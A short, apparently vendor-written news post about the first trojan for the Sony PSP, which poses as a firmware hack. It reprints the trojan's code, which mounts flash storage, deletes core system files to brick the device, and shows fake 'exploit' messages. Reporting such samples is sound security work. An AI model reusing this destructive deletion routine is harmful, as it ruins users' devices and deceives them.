First PSP Trojan

Malware are not for computers alone. Some have evolved to infecting even mobile devices and not to mention some mp3 players too. And now…. they have found another target and you may be one of them, the videogame-enthusiasts. The first trojan for Sony Playstation Portable, otherwise known as PSP has now been found. Originally PSP can only run games which are approved by Sony but of course almost if not all is possible in the computing world — hacks are available which allow users to run their own games. The trojan disguises as some hacking tool to get on board for some other games. Instead, it deletes system files, rendering the machine to be inoperable. Affected systems are those PSPs which had older firmware versions such as 1.50. Each day, malware authors have thought of widening the horizons for infection, the question now lies… what could be next?

Here is the code as seen in some forum:




syscall 0x20a8


syscall 0x209e


call FillVram(0)
call Print(1,1,0xFFFFFF,”PSP TEAM 2.0 Exploit Hack the 2.0 firmware”)
call Print(1,2,0xFFFFFF,”Thank’s to toc2rta for the 2.0 exploit :) “)
call sceIoAssign(“flash6:”, “lflash0:0,0”, “flashfat2:”, 0, 0, 0)
call sceIoRemove(“flash6:/vsh/etc/index.dat”)
call sceIoRemove(“flash6:/kd/loadcore.prx”)
call sceIoRemove(“flash6:/kd/loadexec.prx”)
call sceIoRemove(“flash6:/kd/init.prx”)
call Print(1,4,0xFFFFFF,” Your 2.0 is hacked please reboot “)
call Print(1,5,0xFFFFFF,” Thank you PSP Team the french team”)
call Print(1,6,0xFFFFFF,” FuCk yoshihiro and SonyxTeam Looser”)

Meanwhile, we are currently acquiring sample so heads up for updates.

For more information, you may visit this site.